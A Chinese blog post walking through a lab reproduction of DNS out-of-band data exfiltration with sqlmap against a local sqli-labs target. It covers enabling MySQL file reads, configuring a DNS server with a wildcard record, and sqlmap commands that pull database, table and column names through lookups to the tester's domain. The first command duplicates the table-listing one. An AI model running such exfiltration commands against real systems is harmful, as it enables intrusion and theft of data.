当前位置:网站首页>复现dns外带数据结合sqlmap
复现dns外带数据结合sqlmap
2022-08-10 05:48:00 【鱼传尺素zz】
设置mysql的secure_file_priv属性
secure_file_priv为空,就可以读取磁盘的目录
secure_file_priv为D:\,就可以读取D盘的文件
secure_file_priv为null,load_file就不能加载文件
添加一句secure_file_priv=“”
配置dns服务器
1.添加角色
2.添加正向查找
3.新建主机
IP地址为sqlmap所在虚机的ip地址
在创建一个泛解析
使用虚拟机ping刚刚在服务端设置的域名,并且在kali中输入tcpdump -n port 53;查看信息返回。
4.创建条件转发器
SQLMap使用外带dns注入
取库
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D security --tables
获取表
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" --tables
获取列
sqlmap -u "http://172.16.10.130:8080/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "nanhang.top" -D "security" -t "users" --columns
边栏推荐
猜你喜欢
第12章 数据库其它调优策略【2.索引及调优篇】【MySQL高级】
Ingress Controller performance test(1)
强化学习_03_表格方法实践(CartPole-v0 And MontoCarlo)
【备份】《Unity Shader入门精要》配图
Mysql表数据在命令行窗口下中文乱码问题解决方法
Unity plug-in DOTween User Guide 2 (Brief explanation of Bezier curves)
ebp/栈帧/call stack
unity瓦片地图调整图片大小
Hypervisor, KVM, QEMU总结
强化学习_10_Datawhale稀疏奖励
随机推荐
Analysis of minix_super_block.s_ninodes of mkfs.minix.c
VS Code插件国际化
Teach you to change the kernel source code--sysfs virtual file system 1
排序二叉树代码
全网可达并设备加密
Unity资源热更新--资源管理、Addressable
强化学习_08_Datawhale针对连续动作的深度Q网络
UnityShader入门精要--Unity中的基础光照
OpenGL学习笔记(LearnOpenGL)第一部分-环境配置与基础知识
虚幻5简单第三人称游戏制作文档
Qt列表下方增加弹出加载数据提示效果
Ingress Controller performance test(1)
Win32屏幕坐标转换Qt坐标
OpenGL学习笔记(LearnOpenGL)-第三部分 绘制矩形
Talking about 3 common shadow rendering techniques in games (2): shadow cone
Unity object pool implementation
UnityShader入门精要-高级光照基础
关于研究鼠标绘制平滑曲线的阶段总结
BUUCTF笔记(web)
Two-dimensional cartoon rendering - coloring